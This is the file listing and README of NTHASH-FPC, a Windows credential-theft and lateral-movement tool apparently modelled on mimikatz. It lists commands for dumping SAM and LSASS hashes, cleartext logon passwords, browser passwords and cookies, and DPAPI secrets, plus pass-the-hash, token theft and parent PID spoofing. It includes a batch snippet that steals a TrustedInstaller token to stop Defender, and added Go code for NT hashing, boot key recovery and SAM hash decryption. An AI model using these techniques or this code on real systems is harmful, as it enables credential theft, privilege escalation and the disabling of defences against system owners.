.gitattributes
.gitignore
NC.zip
NTHASH.lpi
NTHASH.lpr
NTHASH.lps
NTHASH.res
NTHASH.zip
README.md
hash.cmd
lsaapi.pas
nc_clt.bat
nc_srv.bat
offreg.dll
offreg64.dll
sqlite3-64.dll
sqlite3.dll
trusted.cmd
uac.RES
uac.manifest
uac.rc
uadvapi32.pas
uchrome.pas
ucryptoapi.pas
ufirefox.pas
uimagehlp.pas
ulsa.pas
umemory.pas
untdll.pas
uofflinereg.pas
upsapi.pas
urunelevatedsupport.pas
usamlib.pas
usamutils.pas
usid.pas
utils.pas
uvaults.pas
uwmi.pas
winsta.pas
wmic
wtsapi32.pas


NTHASH-FPC

A tribute to https://github.com/gentilkiwi/mimikatz... and, more generally, a tool to handle Windows passwords and perform lateral movement.
https://attack.mitre.org/matrices/enterprise/windows/ is definitely worth reading as well.


Command line usage:
NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx
NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx
NTHASH /getntlmhash /password:password
NTHASH /getsid /user:username [/server:hostname]
NTHASH /getusers [/server:hostname]
NTHASH /getdomains [/server:hostname]
NTHASH /dumpsam
NTHASH /dumphashes [/offline]
NTHASH /getsamkey [/offline]
NTHASH /getsyskey [/offline]
NTHASH /getlsakeys
NTHASH /wdigest
NTHASH /logonpasswords
NTHASH /pth /user:username /password:myhash /domain:mydomain
NTHASH /enumcred
NTHASH /enumcred2
NTHASH /enumvault
NTHASH /chrome [/binary:path_to_database]
NTHASH /ccookies [/binary:path_to_database]
NTHASH /firefox [/binary:path_to_database]
NTHASH /fcookies [/binary:path_to_database]
NTHASH /bytetostring /input:hexabytes
NTHASH /stringtobyte /input:string
NTHASH /widestringtobyte /input:string
NTHASH /base64encodew /input:string
NTHASH /base64encode /input:string
NTHASH /base64decode /input:base64string
NTHASH /cryptunprotectdata /binary:filename
NTHASH /cryptunprotectdata /input:string
NTHASH /cryptprotectdata /input:string
NTHASH /getlsasecret /input:secret
NTHASH /dpapimk
NTHASH /dpapi_system
NTHASH /runasuser /user:username /password:password [/binary: x:\folder\bin.exe]
NTHASH /runastoken /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runaschild /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runas [/binary: x:\folder\bin.exe]
NTHASH /runts /user:session_id [/binary: x:\folder\bin.exe]
NTHASH /enumpriv
NTHASH /enumproc
NTHASH /dumpproc /pid:12345
NTHASH /runwmi /binary:x:\folder\bin.exe [/server:hostname]
NTHASH /context
NTHASH /a_command /verbose
NTHASH /a_command /system
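As an added example (Go, not code from NTHASH-FPC), here is what /getntlmhash computes. The NT hash is MD4 over the UTF-16LE encoding of the password, unsalted, which is why a hash read by dumphashes can be handed straight to /pth or to /setntlm /newhash. Go's standard library has no MD4, so the compression function is written out from RFC 1320; the passwords in main are constructed, the first two being the well-known vectors for "" and "password".

```go
package main

import (
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"unicode/utf16"
)

// Per-round rotation amounts and the round-3 word order from RFC 1320.
var (
	s1 = [4]uint{3, 7, 11, 19}
	s2 = [4]uint{3, 5, 9, 13}
	s3 = [4]uint{3, 9, 11, 15}
	o3 = [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}
)

// MD4 over a byte string. crypto/* has no MD4, so the compression function is
// written out; the rounds differ only in boolean function, constant, word order and shifts.
func MD4(msg []byte) [16]byte {
	st := [4]uint32{0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476}
	p := append(append([]byte{}, msg...), 0x80) // pad: 0x80, zeros to 56 mod 64, 64-bit LE bit length
	for len(p)%64 != 56 {
		p = append(p, 0)
	}
	var l [8]byte
	binary.LittleEndian.PutUint64(l[:], uint64(len(msg))*8)
	p = append(p, l[:]...)
	for off := 0; off < len(p); off += 64 {
		md4Block(&st, p[off:off+64])
	}
	var out [16]byte
	for i, v := range st {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

func md4Block(st *[4]uint32, blk []byte) {
	var x [16]uint32
	for i := range x {
		x[i] = binary.LittleEndian.Uint32(blk[4*i:])
	}
	a, b, c, d := st[0], st[1], st[2], st[3]
	rot := func(v uint32, s uint) uint32 { return v<<s | v>>(32-s) }
	// Each step updates one register; rotating the roles (a,b,c,d) -> (d,a,b,c) reproduces
	// the [ABCD][DABC][CDAB][BCDA] pattern of the specification.
	for i := 0; i < 16; i++ { // round 1: F = (b&c)|(^b&d), words in order
		a = rot(a+((b&c)|(^b&d))+x[i], s1[i%4])
		a, b, c, d = d, a, b, c
	}
	for i := 0; i < 16; i++ { // round 2: G = majority, words 0,4,8,12,1,5,...
		a = rot(a+((b&c)|(b&d)|(c&d))+x[i%4*4+i/4]+0x5a827999, s2[i%4])
		a, b, c, d = d, a, b, c
	}
	for i := 0; i < 16; i++ { // round 3: H = b^c^d, bit-reversed word order
		a = rot(a+(b^c^d)+x[o3[i]]+0x6ed9eba1, s3[i%4])
		a, b, c, d = d, a, b, c
	}
	st[0] += a
	st[1] += b
	st[2] += c
	st[3] += d
}

// NTHash is what /getntlmhash computes: MD4 over the password encoded as UTF-16LE,
// unsalted and case-preserving, rendered as the usual 32 hex characters.
func NTHash(password string) string {
	u := utf16.Encode([]rune(password))
	b := make([]byte, 2*len(u))
	for i, v := range u {
		binary.LittleEndian.PutUint16(b[2*i:], v)
	}
	h := MD4(b)
	return hex.EncodeToString(h[:])
}

func main() {
	// Constructed passwords; the first two are the well-known vectors for "" and "password".
	for _, pw := range []string{"", "password", "Pässwörd"} {
		fmt.Printf("%-12q %s\n", pw, NTHash(pw))
	}
}
```

The UTF-16LE step is the detail that trips people up when they try to reproduce a hash with a generic MD4 tool: MD4 over the ASCII bytes of "password" is a different value from its NT hash.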

changentlm goes through a legacy password-change API, so it may not work when the NTLM hashes are stored AES-encrypted (i.e. starting with Windows 10 1607); it also needs the old password or hash.
Credit goes to https://github.com/vletoux/NTLMInjector

setntlm, on the other hand, sets the new hash (or password) directly, so it should always work and lets you bypass the password policy.
Credit goes to https://github.com/vletoux/NTLMInjector

dumpsam temporarily patches a module inside lsass so the SAM NTLM hashes can be dumped from lsass memory (this still needs to be covered/tested on as many Windows versions as possible).

dumphash and dumphashes read the hashes from the registry (SAM and SYSTEM hives), which needs to run as SYSTEM:
. either run the tool as SYSTEM, or use the /system switch;
. or work offline (/offline), which no longer requires running as SYSTEM.
Use reg save hklm\sam sam.sav and reg save hklm\system system.sav (from an elevated prompt) to generate the offline hives.
Both the RC4 and the AES cipher are supported: the SAM key and the per-user hashes are RC4/DES protected on older builds and AES-128-CBC/DES protected from Windows 10 1607 onwards.
https://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/ is a must read to understand RC4 vs AES.
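Added example (Go, standard library only; this is not NTHASH-FPC's code) of the two stages at either end of the offline path described above. BootKey does what /getsyskey does from the SYSTEM hive, and DecryptNTHash peels the per-hash layer (RC4 for the revision 1 layout of older builds, AES-128-CBC for revision 2 from 1607 on) and then the RID-keyed DES layer off the NT hash blob taken from a user's V value. The middle step, decrypting the SAM key (the "hashed boot key") from the domain F value with the syskey, is left out here; the linked write-up covers it. The on-disk offsets follow the write-up and impacket's secretsdump, the DES key derivation follows [MS-SAMR] 2.2.11.1; the class names and RID in main are constructed, not taken from a real machine.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/des"
	"crypto/md5"
	"crypto/rc4"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
)

var (
	samNTPass   = []byte("NTPASSWORD\x00") // mixed into the revision-1 RC4 key
	bootKeyPerm = [16]int{0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7}
	errTrunc    = errors.New("SAM hash blob truncated")
)

// BootKey is what /getsyskey recovers: the class names of
// HKLM\SYSTEM\CurrentControlSet\Control\Lsa\{JD,Skew1,GBG,Data} (8 hex chars
// each) concatenated and then byte-permuted with bootKeyPerm.
func BootKey(jd, skew1, gbg, data string) ([]byte, error) {
	s, err := hex.DecodeString(jd + skew1 + gbg + data)
	if err != nil || len(s) != 16 {
		return nil, errors.New("class names must be four 8-char hex strings")
	}
	key := make([]byte, 16)
	for i, p := range bootKeyPerm {
		key[i] = s[p]
	}
	return key, nil
}

// RIDKeys derives the two DES keys of the innermost layer ([MS-SAMR] 2.2.11.1):
// the little-endian RID bytes rotated into two 7-byte keys, each spread to 8
// bytes with 7 key bits per byte (the low bit is DES parity, ignored by crypto/des).
func RIDKeys(rid uint32) ([]byte, []byte) {
	var r [4]byte
	binary.LittleEndian.PutUint32(r[:], rid)
	spread := func(k []byte) []byte {
		o := []byte{k[0] >> 1, (k[0]&1)<<6 | k[1]>>2, (k[1]&3)<<5 | k[2]>>3, (k[2]&7)<<4 | k[3]>>4,
			(k[3]&0xf)<<3 | k[4]>>5, (k[4]&0x1f)<<2 | k[5]>>6, (k[5]&0x3f)<<1 | k[6]>>7, k[6] & 0x7f}
		for i := range o {
			o[i] <<= 1
		}
		return o
	}
	return spread([]byte{r[0], r[1], r[2], r[3], r[0], r[1], r[2]}), spread([]byte{r[3], r[0], r[1], r[2], r[3], r[0], r[1]})
}

// DecryptNTHash takes the NT hash blob from a user's V value (at V[0xa8]+0xcc) and
// the 16-byte SAM key decrypted from the domain F value. The blob starts with
// PekID(2) Revision(2): revision 1 is the RC4 layout, revision 2 (1607+) is
// AES-128-CBC with a 16-byte salt as IV. Both sit on top of the RID-keyed DES layer.
func DecryptNTHash(blob, samKey []byte, rid uint32) ([]byte, error) {
	if len(blob) < 4 || len(samKey) < 16 {
		return nil, errTrunc
	}
	enc := make([]byte, 16)
	switch rev := binary.LittleEndian.Uint16(blob[2:4]); rev {
	case 1: // pekid(2) rev(2) hash(16); RC4 under MD5(samKey | LE rid | "NTPASSWORD\0")
		if len(blob) < 20 {
			return nil, errTrunc
		}
		var r [4]byte
		binary.LittleEndian.PutUint32(r[:], rid)
		key := md5.Sum(append(append(append([]byte{}, samKey[:16]...), r[:]...), samNTPass...))
		c, _ := rc4.NewCipher(key[:])
		c.XORKeyStream(enc, blob[4:20])
	case 2: // pekid(2) rev(2) dataoffset(4) salt(16) data(16) padding(16)
		if len(blob) < 40 {
			return nil, errTrunc
		}
		blk, _ := aes.NewCipher(samKey[:16])
		cipher.NewCBCDecrypter(blk, blob[8:24]).CryptBlocks(enc, blob[24:40])
	default:
		return nil, fmt.Errorf("unknown hash revision %d", rev)
	}
	k1, k2 := RIDKeys(rid)
	d1, _ := des.NewCipher(k1)
	d2, _ := des.NewCipher(k2)
	out := make([]byte, 16)
	d1.Decrypt(out[:8], enc[:8])
	d2.Decrypt(out[8:], enc[8:])
	return out, nil
}

func main() {
	// Constructed class names (not from a real machine), only to show the calls.
	bk, err := BootKey("00010203", "04050607", "08090a0b", "0c0d0e0f")
	if err != nil {
		panic(err)
	}
	k1, k2 := RIDKeys(500)
	fmt.Printf("syskey %x\nRID 500 DES keys %x %x\n", bk, k1, k2)
}
```

The revision byte is the practical check when a dump comes back as garbage: a tool that only knows the RC4 layout will happily "decrypt" a revision 2 blob into noise, which is exactly the 1607 breakage the text refers to.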

cryptunprotectdata and cryptprotectdata decrypt/encrypt data with DPAPI under the running user's context.
You can for example decrypt a stored wireless password from C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{INTERFACE UUID}\ .
Retrieve the keyMaterial value from the profile XML and run nthash /cryptunprotectdata /input:keymaterial /system .
Note that this data is encrypted/decrypted under the SYSTEM account, hence the /system switch.
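Added example (Go; not NTHASH-FPC's code) showing what sits inside that keyMaterial value before CryptUnprotectData is called: a DPAPI blob whose plaintext header names the master key GUID, the cipher and the hash. The master key GUID is what decides which account the decryption has to run as: a user blob's master key file lives under %APPDATA%\Microsoft\Protect\<SID>\, a SYSTEM blob's (the Wlansvc case) under System32\Microsoft\Protect\S-1-5-18\ (the files /dpapimk enumerates). The field order follows the public layout in mimikatz's kull_m_dpapi.h; the sample blob is constructed with zeroed salt, ciphertext and HMAC and cannot actually be decrypted. Feed the text of a real profile XML to ParseKeyMaterial to read its header the same way.

```go
package main

import (
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

const dpapiProvider = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb" // the only provider GUID Windows writes

// DPAPIBlob is the plaintext header CryptProtectData puts in front of the ciphertext;
// MasterKey is the GUID of the master key file needed to unprotect it.
type DPAPIBlob struct {
	Version, Flags, AlgCrypt, AlgCryptBits, AlgHash, AlgHashBits uint32
	Provider, MasterKey                                          string
	Salt, Data, Sign                                             []byte
}

// cursor walks the length-prefixed fields; the first truncation sticks in err.
type cursor struct {
	b   []byte
	off int
	err error
}

func (c *cursor) take(n int) []byte {
	if c.err == nil && (n < 0 || c.off+n > len(c.b)) {
		c.err = errors.New("DPAPI blob truncated")
	}
	if c.err != nil {
		return make([]byte, 16) // zeros keep the remaining decoding safe; err is reported at the end
	}
	c.off += n
	return c.b[c.off-n : c.off]
}

func (c *cursor) u32() uint32   { return binary.LittleEndian.Uint32(c.take(4)) }
func (c *cursor) field() []byte { return c.take(int(c.u32())) } // DWORD length, then bytes

func (c *cursor) guid() string { // on-disk GUID: first three fields little-endian
	b, le := c.take(16), binary.LittleEndian
	return fmt.Sprintf("%08x-%04x-%04x-%x-%x", le.Uint32(b[0:4]), le.Uint16(b[4:6]), le.Uint16(b[6:8]), b[8:10], b[10:16])
}

// ParseDPAPIBlob reads the header in CryptProtectData's field order (the layout in
// mimikatz's kull_m_dpapi.h); the description and the two legacy HMAC keys are skipped.
func ParseDPAPIBlob(b []byte) (*DPAPIBlob, error) {
	c := &cursor{b: b}
	o := &DPAPIBlob{Version: c.u32(), Provider: c.guid()}
	c.u32() // master key version, always 1
	o.MasterKey, o.Flags = c.guid(), c.u32()
	c.field() // UTF-16LE description
	o.AlgCrypt, o.AlgCryptBits, o.Salt = c.u32(), c.u32(), c.field()
	c.field() // HMAC key
	o.AlgHash, o.AlgHashBits = c.u32(), c.u32()
	c.field() // HMAC2 key
	o.Data, o.Sign = c.field(), c.field()
	if c.err != nil {
		return nil, c.err
	}
	if o.Version != 1 || o.Provider != dpapiProvider {
		return nil, errors.New("not a DPAPI blob: version/provider GUID mismatch")
	}
	return o, nil
}

// ParseKeyMaterial takes the hex between the <keyMaterial> tags of a Wlansvc profile
// XML (the value the README feeds to /cryptunprotectdata) and parses its header.
func ParseKeyMaterial(profileXML string) (*DPAPIBlob, error) {
	_, rest, ok1 := strings.Cut(profileXML, "<keyMaterial>")
	km, _, ok2 := strings.Cut(rest, "</keyMaterial>")
	if !ok1 || !ok2 {
		return nil, errors.New("no keyMaterial element")
	}
	blob, err := hex.DecodeString(strings.TrimSpace(km))
	if err != nil {
		return nil, err
	}
	return ParseDPAPIBlob(blob)
}

// sampleBlobHex is a constructed header (zeroed salt, ciphertext and HMAC): it parses
// like a real blob but holds no real key material and cannot be unprotected.
var sampleBlobHex = "01000000" + "d08c9ddf0115d1118c7a00c04fc297eb" + "01000000" + // version, provider, mk version
	"0102030405060708090a0b0c0d0e0f10" + "00000000" + "020000000000" + // constructed mk GUID, flags, L"" description
	"10660000" + "00010000" + "20000000" + strings.Repeat("00", 32) + "00000000" + // CALG_AES_256, 256 bits, salt, HMAC key
	"0e800000" + "00020000" + "00000000" + // CALG_SHA_512, 512 bits, HMAC2 key
	"20000000" + strings.Repeat("00", 32) + "40000000" + strings.Repeat("00", 64) // ciphertext, signature

func main() {
	p, err := ParseKeyMaterial("<sharedKey><keyMaterial>" + sampleBlobHex + "</keyMaterial></sharedKey>")
	if err != nil {
		panic(err)
	}
	fmt.Printf("master key %s, crypt 0x%x (%d bits), hash 0x%x, %d ciphertext bytes\n",
		p.MasterKey, p.AlgCrypt, p.AlgCryptBits, p.AlgHash, len(p.Data))
}
```

If the master key GUID is not one of the files under your own SID's Protect folder, no amount of /cryptunprotectdata under your own token will help; that is the situation the /system switch exists for.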

enumcred uses the CredEnumerate Windows API to enumerate the logged-on user's credentials.
enumcred2 does the same while also patching lsass so that all credentials are dumped.

enumvault uses the vaultcli.dll Windows API to enumerate the logged-on user's vault credentials.

logonpasswords dumps the primary credentials (hashes) of the logon sessions held by lsasrv, plus the credential manager entries (clear text).

wdigest dumps the wdigest session credentials (clear text).

runastoken can be used to run a process with the token of another process, for example to get a process running under the SYSTEM account.
Once under a SYSTEM account, you can also "steal" a token from TrustedInstaller (run net start trustedinstaller beforehand).
Note that you can steal a TrustedInstaller token directly by using the /system switch.
With a TrustedInstaller token you can perform actions like stopping WinDefend (or killing the process, modifying the AV settings, etc.).
See the example below, which starts the TrustedInstaller service, retrieves its PID and runs a process under that account:
@echo off
net start trustedinstaller
for /F "tokens=1" %%K in ('nthash-win64 /enumproc ^| findstr /i "trustedinstaller"') do ( nthash-win64 /runastoken /pid:%%K /system )

runaschild can be used to run a process as a child of another existing (parent) process, i.e. parent PID spoofing.
Note that some apps (like cmd.exe) crash right after initialization with 0xC0000142 (STATUS_DLL_INIT_FAILED).
Oddly enough, launching notepad.exe this way and then starting cmd.exe from there works...

runas launches a process in elevated mode (UAC elevation).

runts launches a process in the context of another Terminal Services session.
Note that this one needs SeTcbPrivilege, so you first have to find a token holding that privilege (winlogon.exe, for instance) and run under it.

todo/news:
-decrypt SAM hashes online (rather than patching lsass) and offline: done in 1.1
-deal with the new AES cipher used since Windows 10 1607: done in 1.2
-enum Lsasrv.dll!LogonSessionList: done in 1.3
-enum Wdigest.dll!l_LogSessList: done in 1.3
-decrypt DPAPI-encrypted vault and/or credentials: done in 1.4
-patch LogonSessionList and perform pth: done in 1.4
-decrypt chrome and firefox passwords: done in 1.4
-decrypt firefox and chrome passwords/cookies: done in 1.5
-dpapimk command to dump all masterkeys: done in 1.6
-getlsasecret using LsaRetrievePrivateData: done in 1.6
-todo: work out offline decryption of LSA secrets, including the CurrVal and OldVal values
-todo: work out LsaICryptUnprotectData through DLL injection
-todo: work out masterkey decryption based on the SHA1 of the user password
-todo: work out credential blob decryption based on the decrypted masterkey
